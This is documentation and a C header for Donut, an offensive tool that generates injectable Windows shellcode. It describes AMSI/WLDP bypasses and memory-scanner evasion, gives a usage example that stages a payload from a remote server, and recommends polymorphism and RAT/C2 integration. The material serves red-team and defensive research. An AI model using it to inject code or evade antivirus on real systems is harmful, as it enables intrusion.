README.md
# Using Donut

![Alt text](https://github.com/TheWover/donut/blob/master/img/donut.PNG?raw=true "An ASCII donut")                                                                                                               

Version: 0.9.2 *please submit issues and requests for v1.0 release*

Odzhan's blog post (about the generator): https://modexp.wordpress.com/2019/05/10/dotnet-loader-shellcode/

TheWover's blog post (detailed walkthrough, and about how donut affects tradecraft): https://thewover.github.io/Introducing-Donut/

v0.9.2 release blog post: https://thewover.github.io/Bear-Claw/

## Introduction

Donut generates x86 or x64 shellcode from VBScript, JScript, EXE, DLL (including .NET Assemblies) files. This shellcode can be injected into an arbitrary Windows process for in-memory execution. Given a supported file type, parameters and an entry point where applicable (such as Program.Main), it produces position-independent shellcode that loads and runs entirely from memory. A module created by donut can either be staged from a URL or stageless by being embedded directly in the shellcode. Either way, the module is encrypted with the Chaskey block cipher and a 128-bit randomly generated key. After the file is loaded through the PE/ActiveScript/CLR loader, the original reference is erased from memory to deter memory scanners. For .NET Assemblies, they are loaded into a new Application Domain to allow for running Assemblies in disposable AppDomains.

It can be used in several ways.

## As a Standalone Tool

Donut can be used as-is to generate shellcode from VBS/JS/EXE/DLL files or .NET Assemblies. A Linux and Windows executable and a Python module are provided for loader generation. The Python documentation can be found [here](https://github.com/TheWover/donut/blob/master/docs/2019-08-21-Python_Extension.md). The command-line syntax is as described below.

```
 usage: donut [options] <EXE/DLL/VBS/JS>

       Only the finest artisanal donuts are made of shells.

                   -MODULE OPTIONS-

       -n <name>            Module name. Randomly generated by default with entropy enabled.
       -u <URL>             HTTP server that will host the donut module.
       -e <level>           Entropy. 1=disable, 2=use random names, 3=random names + symmetric encryption (default)

                   -PIC/SHELLCODE OPTIONS-

       -a <arch>            Target architecture : 1=x86, 2=amd64, 3=x86+amd64(default).
       -b <level>           Bypass AMSI/WLDP : 1=skip, 2=abort on fail, 3=continue on fail.(default)
       -o <outfile_file>    Default is "loader.bin"
       -f <format>          Output format. 1=raw (default), 2=base64, 3=c, 4=ruby, 5=python, 6=powershell, 7=C#, 8=hex
       -y                   Create new thread for entrypoint and return handle to caller. Default uses existing thread.
       -x <action>          Exiting. 1=exit thread (default), 2=exit process

                   -FILE OPTIONS-

       -c <namespace.class> Optional class name.  (required for .NET DLL)
       -d <name>            AppDomain name to create for .NET. Randomly generated by default with entropy enabled.
       -m <method | api>    Optional method or API name for DLL. (a method is required for .NET DLL)
       -p <parameters>      Optional parameters/command line inside quotations for DLL method/function or EXE.
       -w                   Command line is passed to unmanaged DLL function as ANSI. (default is UNICODE)
       -r <version>         CLR runtime version. MetaHeader used by default or v4.0.30319 if none available.
       -t                   Create new thread for entrypoint of unmanaged EXE.
       -z <engine>          Pack/Compress file. 1=disable, 2=LZNT1, 3=Xpress, 4=Xpress Huffman

 examples:

    donut c2.dll
    donut -a1 -cTestClass -mRunProcess -pnotepad.exe loader.dll
    donut loader.dll -c TestClass -m RunProcess -p"calc notepad" -u http://remote_server.com/modules/
```

### Building Donut

Tags have been provided for each release version of donut that contain the compiled executables. 

* v0.9.2, Bear Claw: https://github.com/TheWover/donut/releases/tag/v0.9.2
* v0.9.2 Beta: https://github.com/TheWover/donut/releases/tag/v0.9.2
* v0.9.1, Apple Fritter: https://github.com/TheWover/donut/releases/tag/v0.9.1
* v0.9, Initial Release: https://github.com/TheWover/donut/releases/tag/v0.9

However, you may also clone and build the source yourself using the provided makefiles. 

## Building From Repository

From a Windows command prompt or Linux terminal, clone the repository and change to the donut directory.

```
git clone http://github.com/thewover/donut
cd donut
```

## Linux

Simply run make to generate an executable, static and dynamic libraries.

```
make
make clean
make debug
```

## Windows

Start a Microsoft Visual Studio Developer Command Prompt and `` cd `` to donut's directory. The Microsft (non-gcc) Makefile can be specified with ``` -f Makefile.msvc ```. The makefile provides the following commmands to build donut:

```
nmake -f Makefile.msvc
nmake clean -f Makefile.msvc
nmake debug -f Makefile.msvc
```

## As a Library

donut can be compiled as both dynamic and static libraries for both Linux (*.a* / *.so*) and Windows(*.lib* / *.dll*). It has a simple API that is described in *docs/api.html*. Two exported functions are provided: ``` int DonutCreate(PDONUT_CONFIG c) ``` and ``` int DonutDelete(PDONUT_CONFIG c) ``` .

## As a Python Module

Donut can be installed and used as a Python module. To install Donut from your current directory, use pip for Python3.

```
pip install .
```

Otherwise, you may install Donut as a Python module by grabbing it from the PyPi repostiory.

```
pip install donut-shellcode
```

## As a Template - Rebuilding the shellcode

*loader/* contains the in-memory execution code for EXE/DLL/VBS/JS and .NET assemblies, which should successfully compile with both Microsoft Visual Studio and MinGW-w64. Make files have been provided for both compilers. Whenever files in the loader directory have been changed, recompiling for all architectures is recommended before rebuilding donut.

### Microsoft Visual Studio

**Due to recent changes in the MSVC compiler, we now only support MSVC versions 2019 and later.**

Open the x64 Microsoft Visual Studio build environment, switch to the *loader* directory, and type the following:

```
nmake clean -f Makefile.msvc
nmake -f Makefile.msvc
```

This should generate a 64-bit executable (*loader.exe*) from *loader.c*. exe2h will then extract the shellcode from the *.text* segment of the PE file and save it as a C array to *loader_exe_x64.h*. When donut is rebuilt, this new shellcode will be used for all loaders that it generates.

To generate 32-bit shellcode, open the x86 Microsoft Visual Studio build environment, switch to the loader directory, and type the following:

```
nmake clean -f Makefile.msvc
nmake x86 -f Makefile.msvc
```

This will save the shellcode as a C array to *loader_exe_x86.h*.

### MinGW-W64

If you're on Linux and *MinGW-W64* has been installed from packages or source, you can rebuild the shellcode using *Makefile.mingw*. Change to the *loader* directory and type the following for the AMD64 shellcode:

```
make -f Makefile.mingw
```

For the x86 shellcode, simply use the x86 label.

```
make -f Makefile.mingw x86
```

Once you've recompiled for all architectures, you may rebuild donut.

## Bypasses

Donut includes a bypass system for AMSI and other security features. Currently we bypass:

* AMSI in .NET v4.8
* Device Guard policy preventing dynamicly generated code from executing

You may customize our bypasses or add your own. The bypass logic is defined in loader/bypass.c.

Each bypass implements the DisableAMSI fuction with the signature ```BOOL DisableAMSI(PDONUT_INSTANCE inst)```, and comes with a corresponding preprocessor directive. We have several ```#if defined``` blocks that check for definitions. Each block implements the same bypass function. For instance, our first bypass is called ```BYPASS_AMSI_A```. If donut is built with that variable defined, then that bypass will be used.

Why do it this way? Because it means that only the bypass you are using is built into loader.exe. As a result, the others are not included in your shellcode. This reduces the size and complexity of your shellcode, adds modularity to the design, and ensures that scanners cannot find suspicious blocks in your shellcode that you are not actually using.

Another benefit of this design is that you may write your own AMSI bypass. To build Donut with your new bypass, use an ```if defined``` block for your bypass and modify the makefile to add an option that builds with the name of your bypass defined.

If you wanted to, you could extend our bypass system to add in other pre-execution logic that runs before your .NET Assembly is loaded. 

Odzhan wrote a [blog post](https://modexp.wordpress.com/2019/06/03/disable-amsi-wldp-dotnet/) on the details of our AMSI bypass research.

### Additional features.

These are left as exercises to the reader. I would personally recommend:

* Add environmental keying
* Make donut polymorphic by obfuscating *loader* every time shellcode is generated
* Integrate donut as a module into your favorite RAT/C2 Framework

## Disclaimers

* No, we will not update donut to counter signatures or detections by any AV.
* We are not responsible for any misuse of this software or technique. Donut is provided as a demonstration of CLR Injection through shellcode in order to provide red teamers a way to emulate adversaries and defenders a frame of reference for building analytics and mitigations. This inevitably runs the risk of malware authors and threat actors misusing it. However, we believe that the net benefit outweighs the risk. Hopefully that is correct.

# How it works

## Procedure for Assemblies

Donut uses the Unmanaged CLR Hosting API to load the Common Language Runtime. If necessary, the Assembly is downloaded into memory. Either way, it is decrypted using the Chaskey block cipher. Once the CLR is loaded into the host process, a new AppDomain will be created using a random name unless otherwise specified. Once the AppDomain is ready, the .NET Assembly is loaded through AppDomain.Load_3. Finally, the Entry Point specified by the user is invoked with any specified parameters.

The logic above describes how the shellcode generated by donut works. That logic is defined in *loader.exe*. To get the shellcode, *exe2h* extracts the compiled machine code from the *.text* segment in *loader.exe* and saves it as a C array to a C header file. *donut* combines the shellcode with a Donut Instance (a configuration for the shellcode) and a Donut Module (a structure containing the .NET assembly, class name, method name and any parameters).

Refer to MSDN for documentation on the Undocumented CLR Hosting API: https://docs.microsoft.com/en-us/dotnet/framework/unmanaged-api/hosting/clr-hosting-interfaces

For a standalone example of a CLR Host, refer to Casey Smith's AssemblyLoader repo: https://github.com/caseysmithrc/AssemblyLoader

Detailed blog posts about how donut works are available at both Odzhan's and TheWover's blogs. Links are at the top of the README.

## Procedure for ActiveScript

The details of how Donut loads scripts from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/07/21/inmem-exec-script/).

## Procedure for PE Loading

The details of how Donut loads PE files from memory have been detailed by Odzhan in a [blog post](https://modexp.wordpress.com/2019/06/24/inmem-exec-dll/).

Only PE files with relocation information (.reloc) are supported. TLS callbacks are only executed for the initial execution of entrypoint.

## Components

Donut contains the following elements:

* donut.c: The source code for the donut loader generator.
* donut.exe: The compiled loader generator as an EXE.
* donut.py: The donut loader generator as a Python script *(planned for version 1.0)*
* donutmodule.c: The CPython wrapper for Donut. Used by the Python module.
* setup.py: The setup file for installing Donut as a Pip Python3 module.
* lib/donut.dll, lib/donut.lib: Donut as a dynamic and static library for use in other projects on Windows platform.
* lib/donut.so, lib/donut.a: Donut as a dynamic and static library for use in other projects on the Linux platform.
* lib/donut.h: Header file to include if using the static or dynamic libraries in a C/C++ project.
* loader/loader.c: Main file for the shellcode.
* loader/inmem_dotnet.c: In-Memory loader for .NET EXE/DLL assemblies.
* loader/inmem_pe.c: In-Memory loader for EXE/DLL files.
* loader/inmem_script.c: In-Memory loader for VBScript/JScript files.
* loader/activescript.c: ActiveScriptSite interface required for in-memory execution of VBS/JS files.
* loader/wscript.c: Supports a number of WScript methods that cscript/wscript support.
* loader/bypass.c: Functions to bypass Anti-malware Scan Interface (AMSI) and Windows Local Device Policy (WLDP).
* loader/http_client.c: Downloads a module from remote staging server into memory.
* loader/peb.c: Used to resolve the address of DLL functions via Process Environment Block (PEB).
* loader/clib.c: Replaces common C library functions like memcmp, memcpy and memset.
* loader/inject.exe: The compiled C shellcode injector.
* loader/inject.c: A C shellcode injector that injects loader.bin into a specified process for testing.
* loader/runsc.c: A C shellcode runner for testing loader.bin in the simplest manner possible.
* loader/runsc.exe: The compiled C shellcode runner.
* loader/exe2h/exe2h.c: Source code for exe2h.
* loader/exe2h/exe2h.exe: Extracts the useful machine code from loader.exe and saves as array to C header file.
* encrypt.c: Chaskey 128-bit block cipher in Counter (CTR) mode used for encryption.
* hash.c: Maru hash function. Uses the Speck 64-bit block cipher with Davies-Meyer construction for API hashing.

# Subprojects

There are three companion projects provided with donut:

* DemoCreateProcess: A sample .NET Assembly to use in testing. Takes two command-line parameters that each specify a program to execute.
* DonutTest: A simple C# shellcode injector to use in testing donut. The shellcode must be base64 encoded and copied in as a string. 
* ModuleMonitor: A proof-of-concept tool that detects CLR injection as it is done by tools such as donut and Cobalt Strike's execute-assembly.
* ProcessManager: A Process Discovery tool that offensive operators may use to determine what to inject into and defensive operators may use to determine what is running, what properties those processes have, and whether or not they have the CLR loaded. 

# Project plan

* ~~Create a donut Python C extension that allows users to write Python programs that can use the donut API programmatically. It would be written in C, but exposed as a Python module.~~
* ~~Create a C# version of the generator.~~
* Create a donut.py generator that uses the same command-line parameters as donut.exe.
* Add support for HTTP proxies.
* ~~Find ways to simplify the shellcode if possible.~~
* Write a blog post on how to integrate donut into your tooling, debug it, customize it, and design loaders that work with it.
* ~~Dynamic Calls to DLL functions.~~
* ~~Handle the ProcessExit event from AppDomain using unmanaged code.~~


CHANGELOG
# Changelog
All notable changes to this project will be documented in this file.

## [0.9.3]

### Added

- The -e switch can be used to disable entropy and/or encryption.
- The -z switch can be used on Windows to specify compression.
- The -f switch is now used to specify the output format.
- On Windows, the base64 encoded string is copied to the clipboard.
- Unmanaged entrypoint can be run as a thread with -t option.
- The -n switch can be used to specify name of module for HTTP staging.
- Target/Host process for shellcode can be terminated with -x switch.
- Command line read by GetCommandLineA, GetCommandLineW, __getmainargs, __wgetmainargs, _acmdln, _wcmdln replaced for unmanaged EXE files.
- Arguments for DLL function can be passed in as ANSI with -w option. Default is UNICODE.

### Changed

- Command line is no longer parsed using semi-colon or comma as a token.
- Calling a DLL function only requires passing a command line.

### Removed

- XSL files are no longer supported.
- Code stub for calling DLL function with multiple arguments.

donut.h
/**
  BSD 3-Clause License

  Copyright (c) 2019, TheWover, Odzhan. All rights reserved.

  Redistribution and use in source and binary forms, with or without
  modification, are permitted provided that the following conditions are met:

  * Redistributions of source code must retain the above copyright notice, this
    list of conditions and the following disclaimer.

  * Redistributions in binary form must reproduce the above copyright notice,
    this list of conditions and the following disclaimer in the documentation
    and/or other materials provided with the distribution.

  * Neither the name of the copyright holder nor the names of its
    contributors may be used to endorse or promote products derived from
    this software without specific prior written permission.

  THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
  AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
  IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
  DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
  FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
  DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
  SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
  CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
  OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
  OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/

#ifndef DONUT_H
#define DONUT_H

#ifndef PAYLOAD_H

#if defined(DEBUG)
 #define DPRINT(...) { \
   fprintf(stderr, "DEBUG: %s:%d:%s(): ", __FILE__, __LINE__, __FUNCTION__); \
   fprintf(stderr, __VA_ARGS__); \
   fprintf(stderr, "\n"); \
 }
#else
 #define DPRINT(...) // Don't do anything in release builds
#endif

#if defined(_MSC_VER)

  #ifdef DLL
    #pragma warning( push ) 
    #pragma warning( disable : 4100 )
  #endif

#define _CRT_SECURE_NO_WARNINGS
#pragma warning(disable : 4255)
#pragma warning(disable : 4668)
#include <windows.h>
#pragma comment(lib, "crypt32.lib")
#pragma comment(lib, "advapi32.lib")

#else
  #include <openssl/pem.h>
  #include <openssl/evp.h>
  #include <openssl/rsa.h>
  #include <openssl/rand.h>
#endif

#ifndef SWAP32
  #ifdef _MSC_VER
    #define SWAP32(x) _byteswap_ulong(x)
  #else
    #define SWAP32(x) __builtin_bswap32(x)
  #endif
#endif

#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>

#endif

#include "hash.h"        // api hashing
#include "encrypt.h"     // symmetric encryption of instance+module

#if !defined(_WIN32) && !defined(_WIN64)
typedef uint64_t ULONG64, *PULONG64;
typedef uint32_t DWORD, *PDWORD;
typedef uint16_t WORD, *PWORD;
typedef uint8_t  BYTE, *PBYTE;

typedef uint16_t WCHAR, *PWCHAR;
typedef char     CHAR, *PCHAR;

typedef void VOID;
typedef size_t SIZE_T;

typedef struct _GUID {
  DWORD Data1;
  WORD  Data2;
  WORD  Data3;
  BYTE  Data4[8];
} GUID;
#endif

#define DONUT_ERROR_SUCCESS            0
#define DONUT_ERROR_ASSEMBLY_NOT_FOUND 1
#define DONUT_ERROR_ASSEMBLY_EMPTY     2 // zero sized file
#define DONUT_ERROR_NO_MEMORY          3
#define DONUT_ERROR_NO_PRIVATE_KEY     4
#define DONUT_ERROR_NO_PUBLIC_KEY      5
#define DONUT_ERROR_DECODE_KEY         6
#define DONUT_ERROR_IMPORT_KEY         7
#define DONUT_ERROR_HASH               8
#define DONUT_ERROR_SIGN               9
#define DONUT_ERROR_PAYLOAD_MISSING   10 // not found
#define DONUT_ERROR_PAYLOAD_INVALID   11 // zero-size
#define DONUT_ERROR_PAYLOAD_ACCESS    12 // unable to open payload

// don't change values below
#define DONUT_SIG_LEN            (2048/8)   // 2048-bit signature
#define DONUT_KEY_LEN             CIPHER_KEY_LEN
#define DONUT_BLK_LEN             CIPHER_BLK_LEN
#define DONUT_PUBKEY_LEN             512

// target architecture
#define DONUT_ARCH_X86                 0
#define DONUT_ARCH_AMD64               1

// module type
#define DONUT_MODULE_DLL               0
#define DONUT_MODULE_EXE               1

// apparently C# can support 2^16 or 65,536 parameters
// we support up to eight for now :)
#define DONUT_MAX_PARAM     8        // maximum number of parameters passed to method
#define DONUT_MAX_NAME     32        // maximum length of string for class, method and parameter names
#define DONUT_MAX_DLL       8        // maximum number of DLL supported by instance
#define DONUT_MAX_URL     128
#define DONUT_MAX_RES_NAME 16

#define DONUT_RUNTIME_NET2 "v2.0.50727"
#define DONUT_RUNTIME_NET4 "v4.0.30319"

typedef enum _DONUT_INSTANCE_TYPE {
    DONUT_INSTANCE_PIC = 0,          // self-contained
    DONUT_INSTANCE_URL = 1,          // download from remote server
    DONUT_INSTANCE_DLL = 2           // load from resource section
} DONUT_INSTANCE_TYPE;

// based on imports we need, the max length of dll string is 12 bytes
// the max is set to 16 for alignmemt
#define DONUT_MAX_DLL_STR_LEN 16

#define KERNEL32_DLL "kernel32.dll"
#define ADVAPI32_DLL "advapi32.dll"
#define CRYPT32_DLL  "crypt32.dll"
#define MSCOREE_DLL  "mscoree.dll"
#define OLEAUT32_DLL "oleaut32.dll"
#define WININET_DLL  "wininet.dll"

typedef struct _API_IMPORT {
    const char *module;
    const char *name;
} API_IMPORT, *PAPI_IMPORT;

typedef struct _DONUT_CRYPT {
    BYTE        key[DONUT_KEY_LEN];  // 128-bit key
    BYTE        ctr[DONUT_BLK_LEN];  // 128-bit counter + nonce
} DONUT_CRYPT, *PDONUT_CRYPT;
    
// everything required for a module goes in the following structure
// it is encrypted and then signed with RSA key
// upon deploying to system, signature is verified before decrypting with static key in
// a donut instance
typedef struct _DONUT_MODULE {
    DWORD   type;                                   // EXE or DLL
    BYTE    modsig[DONUT_SIG_LEN];                  // RSA signature 
    WCHAR   runtime[DONUT_MAX_NAME];                // runtime version
    WCHAR   cls[DONUT_MAX_NAME];                    // name of class and optional namespace
    WCHAR   method[DONUT_MAX_NAME];                 // name of method
    DWORD   param_cnt;                              // number of parameters
    WCHAR   param[DONUT_MAX_PARAM][DONUT_MAX_NAME]; // string parameters passed to method
    DWORD   len;                                    // size of .NET assembly
    BYTE    data[4];                                // .NET assembly
} DONUT_MODULE, *PDONUT_MODULE;

// everything required for the loader goes in the following structure
// it contains everything that might be used to identify a payload 
// it is encrypted with static key
typedef struct _DONUT_INSTANCE {
    DWORD       dwLen;                     // total length of instance, not including the Key
    DONUT_CRYPT Key;                       // decrypts instance data
    // everything from this point is encrypted
    DWORD       DllCount;                  // how many DLL to load before resolving API
    CHAR        szDll[DONUT_MAX_DLL][32];  // list of DLL strings to load
    DWORD       Reserved1;
    ULONG64     ulIV;                      // 64-bit initial value for maru hash
    DWORD       ApiCount;                  // 64-bit hashes of API required for instance to work
    DWORD       Reserved2;
    
    union {
      ULONG64   hash[48];
      VOID     *addr[48];
      // include prototypes only if header included from payload.h
      #ifdef PAYLOAD_H
      struct {
        // imports from kernel32.dll
        LoadLibraryA_t             LoadLibraryA;
        
        VirtualAlloc_t             VirtualAlloc;             
        VirtualFree_t              VirtualFree;              
        LocalFree_t                LocalFree;                
        FindResource_t             FindResource;             
        LoadResource_t             LoadResource;             
        LockResource_t             LockResource;             
        SizeofResource_t           SizeofResource;           
        
        // imports from mscoree.dll
        CLRCreateInstance_t        CLRCreateInstance;        
        
        // imports from oleaut32.dll
        SafeArrayCreate_t          SafeArrayCreate;          
        SafeArrayCreateVector_t    SafeArrayCreateVector;    
        SafeArrayPutElement_t      SafeArrayPutElement;      
        SafeArrayDestroy_t         SafeArrayDestroy;         
        SysAllocString_t           SysAllocString;           
        SysFreeString_t            SysFreeString;            
        
        // imports from wininet.dll
        InternetCrackUrl_t         InternetCrackUrl;         
        InternetOpen_t             InternetOpen;             
        InternetConnect_t          InternetConnect;          
        InternetSetOption_t        InternetSetOption;        
        InternetReadFile_t         InternetReadFile;         
        InternetCloseHandle_t      InternetCloseHandle;      
        HttpOpenRequest_t          HttpOpenRequest;          
        HttpSendRequest_t          HttpSendRequest;          
        HttpQueryInfo_t            HttpQueryInfo;            
        
        // imports from advapi32.dll
        CryptAcquireContext_t      CryptAcquireContext;      
        CryptCreateHash_t          CryptCreateHash;          
        CryptHashData_t            CryptHashData;            
        CryptVerifySignature_t     CryptVerifySignature;     
        CryptDestroyHash_t         CryptDestroyHash;         
        CryptDestroyKey_t          CryptDestroyKey;          
        CryptReleaseContext_t      CryptReleaseContext;      
        
        // imports from crypt32.dll
        CryptStringToBinaryA_t     CryptStringToBinaryA;     
        CryptDecodeObjectEx_t      CryptDecodeObjectEx;      
        CryptImportPublicKeyInfo_t CryptImportPublicKeyInfo; 
      };
      #endif
    } api;
    
    // GUID required to load .NET assembly
    GUID xCLSID_CLRMetaHost;
    GUID xIID_ICLRMetaHost;  
    GUID xIID_ICLRRuntimeInfo;
    GUID xCLSID_CorRuntimeHost;
    GUID xIID_ICorRuntimeHost;
    GUID xIID_AppDomain;
    
    DONUT_INSTANCE_TYPE dwType; // PIC, DLL or URL 
    
    union {
      // module is stored remotely
      struct {
        CHAR url[DONUT_MAX_URL];
        CHAR req[16];         // just a buffer for "GET"
      } http;
      
      // module is stored in resource section
      struct {
        CHAR name[DONUT_MAX_RES_NAME];
        CHAR type[DONUT_MAX_RES_NAME];
      } resource;
    } TypeInfo;
    
    // public key to verify signature of a module
    // requires 4*(DONUT_SIG_LEN/3) bytes plus extra for header/footer
    CHAR pubkey[DONUT_PUBKEY_LEN];
    
    DONUT_CRYPT ModuleKey;     // used to decrypt module
    SIZE_T      ModuleLen;     // total size of module including signature
    
    union {
      PDONUT_MODULE p;         // for URL or DLL
      DONUT_MODULE  x;         // for PIC
    } Assembly;
} DONUT_INSTANCE, *PDONUT_INSTANCE;
    
typedef struct _DONUT_CONFIG {
    int            arch;        // target architecture for shellcode
    int            type;
    char           modname[32]; // name of module written to disk
    char           *cls;        // name of class and optional namespace
    char           *method;     // name of method to execute
    char           *param;      // string parameters passed to method, separated by comma or semi-colon
    char           *file;       // assembly to create module from
    char           *url;        // points to root path of where module will be on remote http server
    
    char           *privkey;    // pointer to private key PEM file
    char           *pubkey;     // pointer to public key PEM file
    
    int             modlen;     // size of DONUT_MODULE
    PDONUT_MODULE   mod;        // pointer to donut module
    
    int             instlen;
    PDONUT_INSTANCE inst;       // pointer to donut instance
    
    int             payloadlen;
    void*           payload;    // points to PIC
} DONUT_CONFIG, *PDONUT_CONFIG;

#ifdef __cplusplus
extern "C" {
#endif

#ifdef DLL
#define EXPORT_FUNC __declspec(dllexport)
#else
#define EXPORT_FUNC
#endif

EXPORT_FUNC int CreatePayload(PDONUT_CONFIG);
EXPORT_FUNC int CreateInstance(PDONUT_CONFIG);
EXPORT_FUNC int CreateModule(PDONUT_CONFIG);
EXPORT_FUNC int SignModule(PDONUT_CONFIG);
EXPORT_FUNC int GenRandom(void *buf, size_t len);

#ifdef __cplusplus
}
#endif

#endif
